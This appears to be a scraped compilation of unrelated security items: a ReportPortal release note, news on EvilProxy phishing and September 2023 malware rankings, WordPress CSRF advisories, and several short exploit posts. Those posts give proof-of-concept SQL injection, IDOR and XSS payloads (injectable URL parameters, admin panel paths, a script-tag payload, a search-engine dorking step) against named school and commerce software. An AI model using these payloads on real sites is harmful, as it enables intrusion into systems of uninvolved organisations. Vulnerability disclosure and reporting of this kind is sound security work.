ReportPortal is an AI-powered test automation platform. Prior to version 5.10.0 of the `com.epam.reportportal:service-api` module, corresponding to ReportPortal version 23.2, the ReportPortal database becomes unstable and reporting almost fully stops except for small launches with approximately 1 test inside when the test_item.path field is exceeded the allowable `ltree` field type indexing limit (path length>=120, approximately recursive nesting of the nested steps). REINDEX INDEX path_gist_idx and path_idx aren't helped. The problem was fixed in `com.epam.reportportal:service-api` module version 5.10.0 (product release 23.2), where the maximum number of nested elements were programmatically limited. A workaround is available. After deletion of the data with long paths, and reindexing both indexes (path_gist_idx and path_idx), the database becomes stable and ReportPortal works properly.

*   **New feature - Monitoring:**

A new Event Monitoring interface has been introduced, providing administrators with a convenient means to review all activities at the Project level through the Search & Filter functionality within the Admin panel. Events at the instance level are not visible on the UI, but they are securely stored in the database. This data can be easily transmitted to SIEM systems for future monitoring and analysis.

More details can be found via the link.

*   **Project Activity Panel Adjustments:**

The list of project activities displayed in the Project Activity Panel has been expanded.

More details can be found via the link.

info

Please take into account that starting from this point forward, all events will have a new format for their storing in the database. Consequently, all events which have been stored prior to version 23.2 will be deleted.

*   **New feature – Delete Account:**

Now instance administrators can empower users to delete their accounts and obfuscate associated personal data.

More details can be found via the link.

*   **New feature – Personal Data Retention policy:**

ReportPortal now offers the option to set a retention period for collected personal data during instance configuration.

More details can be found via the link.

note

Please note that Features 3 and 4 are configurable, giving you the flexibility to decide whether you want to use these features or not. If you choose to utilize them, you can configure them using environmental variables. Further details can be found in the respective documentation.

*   **New feature – API Key:**

You can now generate as many API Keys as you need. You also have the ability to keep track of the creation date of API Keys and revoke any that are unused. Old tokens will still continue to function. Additionally, easy identification of the purpose of API Keys is facilitated through the use of prefixes.

More details can be found via the link.

*   **Gitlab CI integration Workaround:**

More details can be found via the link.

*   **“Load current step” functionality adjustments:**

Minor refinements have been applied to the "Load current step" functionality. Now, you can access the "Load current step" feature by hovering over a step.

*   **Download file name changes:**

Attachment details and download format have been revised: files are now downloaded with the real file names.

*   **Configuration examples updates:**

Configuration examples on the user profile page have been updated.

*   Storage layer now supports S3 storage, allowing data consolidation into a single bucket for the entire instance.
    
*   We’ve added postfix for bucket names in binary storage.
    
*   We’ve updated dependencies with security fixes: service-auto-analyzer and service-metrics-gatherer.
    
*   The issue of slow Log View loading when STEP has a complex structure of the nested steps nesting and count of them has been resolved and now up to 7x faster.
    
*   Service-jobs stability is improved during the reporting logs with the large stack traces.
    
*   We’ve optimized the attachments cleaning mechanism that allows us to increase the default value of the chunk\_size by 20 times: from 1000 to 20000 in the docker compose and Kubernetes deployments.
    
*   Content Security Policy has been extended by adding the .browserstack.com. Now you can embed videos as a markdown from BrowserStack in order to ease failed tests troubleshooting.
    
*   Job for Flushing Demo data works as expected thanks to sql error fix.
    
*   We’ve updated react to version 17 and its dependencies to reduce the number of vulnerabilities and have a smooth transition to version 18.
    
*   Issues arising when service-api is starting (connected to bucket structure update or the binary storage type update) while there are integrations to external services like Jira have been resolved. Old logic for migrating integration salt has been removed.
    
*   Launches import via API is possible with additional parameters: name, description, attributes.
    
*   Rename notIssue parameter for import launch : For the end-point POST/v1 /{projectName} /launch /import parameter notIssue is renamed to skippedIsNotIssue. Logic remains the same.
    

*   #1815, #1795, #957, #1644, #1590. All ReportPortal images now support multiple platforms: linux/amd64
    
*   #1970. Deserialization issue has been fixed.
    

Service Name

Repository

Tag

Index

reportportal/service-index

5.10.0

Authorization

reportportal/service-authorization

5.10.0

UI

reportportal/service-ui

5.10.0

API

reportportal/service-api

5.10.0

Jobs

reportportal/service-jobs

5.10.0

Migrations

reportportal/migrations

5.10.0

Auto Analyzer

reportportal/service-auto-analyzer

5.10.0

Metrics Gatherer

reportportal/service-metrics-gatherer

5.10.0

Migration guide

CVE-2023-25822: Version v.23.2 | ReportPortal Documentation

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass Junior 4.0 SQL Injection

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

**eClass IP 2.5 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | b711babfc66671ea5103fe26d521747c60621f2c26be69bc9fb4ef7463b6da31

Download | Favorite | View

**eClass IP 2.5 SQL Injection**

    ====================================================================================================================================| # Title     : eClass IP 2.5 Sql injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-ip/                                                                    |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass IP 2.5 SQL Injection

Chicv Management System Login version 4.5.6 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Chicv Management System Login v4.5.6 IDOR Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://chicv.com/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/#/home[+] https://127.0.0.wwwjustfashionnowcom/admin/#/homeGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Chicv Management System Login 4.5.6 Insecure Direct Object Reference

Aicte India LMS version 3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.facebook.com/OfficialAICTE/                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt>[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 Cross Site Scripting

Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks.
Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and

Credential Harvesting / Hacking

Senior executives working in U.S.-based organizations are being targeted by a new phishing campaign that leverages a popular adversary-in-the-middle (AiTM) phishing toolkit named EvilProxy to conduct credential harvesting and account takeover attacks.

Menlo Security said the activity started in July 2023, primarily singling out banking and financial services, insurance, property management and real estate, and manufacturing sectors.

"The threat actors leveraged an open redirection vulnerability on the job search platform 'indeed.com,'redirecting victims to malicious phishing pages impersonating Microsoft," security researcher Ravisankar Ramprasad said in a report published last week.

EvilProxy, first documented by Resecurity in September 2022, functions as a reverse proxy that's set up between the target and a legitimate login page to intercept credentials, two-factor authentication (2FA) codes, and session cookies to hijack accounts of interest.

The threat actors behind the AiTM phishing kit are tracked by Microsoft under the moniker Storm-0835 and are estimated to have hundreds of customers.

"These cyber criminals pay monthly license fees ranging from $200 to $1,000 USD and carry out daily phishing campaigns," the tech giant said. "Because so many threat actors use these services, it is impractical to attribute campaigns to specific actors."

In the latest set of attacks documented by Menlo Security, victims are sent phishing emails with a deceptive link pointing to Indeed, which, in turn, redirects the individual to an EvilProxy page to harvest the credentials entered.

This is accomplished by taking advantage of an open redirect flaw, which occurs when a failure to validate user input causes a vulnerable website to redirect users to arbitrary web pages, bypassing security guardrails.

"The subdomain 't.indeed.com' is supplied with parameters to redirect the client to another target (example.com)," Ramprasad said.

"The parameters in the URL that follow the '?' are a combination of parameters unique to indeed.com and the target parameter whose argument consists of the destination URL. Hence the user upon clicking the URL ends up getting redirected to example.com. In an actual attack, the user would be redirected to a phishing page."

The development arrives as threat actors are leveraging Dropbox to create fake login pages with embedded URLs that, when clicked, redirect users to bogus sites that are designed to steal Microsoft account credentials as part of a business email compromise (BEC) scheme.

"It's yet another example of how hackers are utilizing legitimate services in what we call BEC 3.0 attacks," Check Point said. "These attacks are incredibly difficult to stop and identify, for both security services and end users."

Microsoft, in its Digital Defense Report, noted how "threat actors are adapting their social engineering techniques and use of technology to carry out more sophisticated and costly BEC attacks" by abusing cloud-based infrastructure and exploiting trusted business relationships.

It also comes as the Police Service of Northern Ireland warned of an uptick in qishing emails, which involve sending an email with a PDF document or a PNG image file containing a QR code in an attempt to sidestep detection and trick victims into visiting malicious sites and credential harvesting pages.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Using EvilProxy Phishing Kit to Target Senior Executives in U.S. Firms

Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Agent (Linux, macOS, Windows) before build 36497.

CVE-2023-45247

By Waqas
September 2023’s Most Wanted Malware: Remcos Wreaks Havoc in Colombia and Formbook Takes Top Spot after Qbot Shutdown, reveals Check Point.
This is a post from HackRead.com Read the original post: Formbook Takes the Throne as Most Prevalent Malware

Check Point’s Global Threat Index for September 2023, released on October 6th, revealed that Education and Research remain the top targeted industries in September 2023.

The cybersecurity researchers at Check Point have released its Global Threat Index for September 2023, revealing significant shifts in the cyber threat landscape. The report highlights a notable phishing campaign that targeted numerous organizations in Colombia, resulting in the surge of the Remcos Remote Access Trojan (RAT) and the rise of Formbook as the most prevalent malware following the demise of Qbot.

Here, it’s worth noting that Qbot, also known as Qakbot and Pinkslipbot malware, faced disruption by the FBI in August 2023, having infected 700,000 computers globally. Despite this disruption, a recent report from Cisco Talos Intelligence Group reveals that the cybercriminals responsible for Qbot remain active, now distributing a new malware known as Ransom Knight.

****Colombia Under Attack: Remcos RAT Unleashed****

In September, Check Point Research uncovered a large-scale phishing campaign aimed at over 40 prominent businesses across various industries in Colombia. The primary objective of this campaign was to surreptitiously deploy the Remcos RAT on victims’ computers.

Remcos ranked as the second most prevalent malware in September, is a sophisticated Remote Access Trojan, offering attackers full control over the infected systems and versatile malicious capabilities. The consequences of a Remcos infection are dire, encompassing data theft, subsequent malware infections, and account takeovers.

Maya Horowitz, VP of Research at Check Point Software, stated, “The campaign that we uncovered in Colombia offers a glimpse into the intricate world of evasion techniques employed by attackers. It is also a good illustration of how invasive these techniques are and why we need to employ cyber resilience to guard against a variety of attack types.”

****Formbook Takes the Throne****

The September Global Threat Report Index also revealed a noteworthy shift in the top malware rankings. Formbook, an Infostealer targeting Windows OS, claimed the number one spot with a global impact of 3% on organizations worldwide.

First detected in 2016, Formbook data stealer is marketed as Malware as a Service (MaaS) in underground hacking forums for its potent evasion techniques and relatively low price. Its capabilities include harvesting credentials from web browsers, capturing screenshots, logging keystrokes, and executing files on the attacker’s command.

****Qbot’s Reign Ends**?**

The most significant change in the malware landscape was the exit of Qbot from the top malware list. The FBI had seized control of the Qbot botnet in August, marking the end of its long-standing reign as the most prevalent malware throughout most of 2023.

However, as the group responsible for Qbot is still active and already disseminating new malware, the significance of the disruption of the malware’s infrastructure may have somewhat diminished.

****Top Attacked Industries and Vulnerabilities****

In terms of attacked industries globally, Education/Research remained the top target, followed by Communications and Government/Military. These sectors continue to face relentless cyber threats.

Regarding exploited vulnerabilities, “Web Servers Malicious URL Directory Traversal” took the top spot, affecting 47% of organizations worldwide. This vulnerability allows unauthenticated remote attackers to access arbitrary files on vulnerable servers. “Command Injection Over HTTP” followed closely with 42%, and “Zyxel ZyWALL Command Injection” was at 39% in terms of impact.

****Malware Attacks Against Smartphones****

In the mobile malware arena, Anubis retained its position as the most prevalent mobile malware, followed by AhMyth and SpinOk. Anubis, initially a banking Trojan, has evolved to include Remote Access Trojan (RAT) functionality, keylogging, audio recording capabilities, and ransomware features.

AhMyth, discovered in 2017, is another RAT distributed through Android apps that collect sensitive information from infected devices. SpinOk, operating as spyware, was found in over 100 Android apps, amassing more than 421 million downloads as of May 2023.

As cybersecurity threats continue to evolve, organizations must remain vigilant and proactive in implementing robust cybersecurity measures to protect against the ever-present dangers of malware and vulnerabilities.

****_RELATED ARTICLES_****

1.  US, India and China Most Targeted in DDoS Attacks
2.  Microsoft Office Most Exploited Software in Malware Attacks
3.  Schools Are the Most Targeted Industry by Ransomware Gangs
4.  Russian Dark Net Markets Dominate the Global Illicit Drug Trade
5.  What Are the Top 10 Android Edu Apps That Collect Most User Data?
6.  VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware
7.  Microsoft, PayPal & Facebook most targeted brands in phishing scams

Formbook Takes the Throne as Most Prevalent Malware

Cross-Site Request Forgery (CSRF) vulnerability in QuantumCloud AI ChatBot plugin <= 4.7.8 versions.

**Solution**

 Fixed

Update the WordPress ChatBot plugin to the latest available version (at least 4.7.9).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress ChatBot Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 4.7.9.

**Other vulnerabilities in this plugin**

 0 present

 12 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-44993: WordPress AI ChatBot plugin <= 4.7.8 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Michael Tran Table of Contents Plus plugin <= 2302 versions.

**Solution**

 Fixed

Update the WordPress Table of Contents Plus plugin to the latest available version (at least 2309).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Table of Contents Plus Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2309.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#auth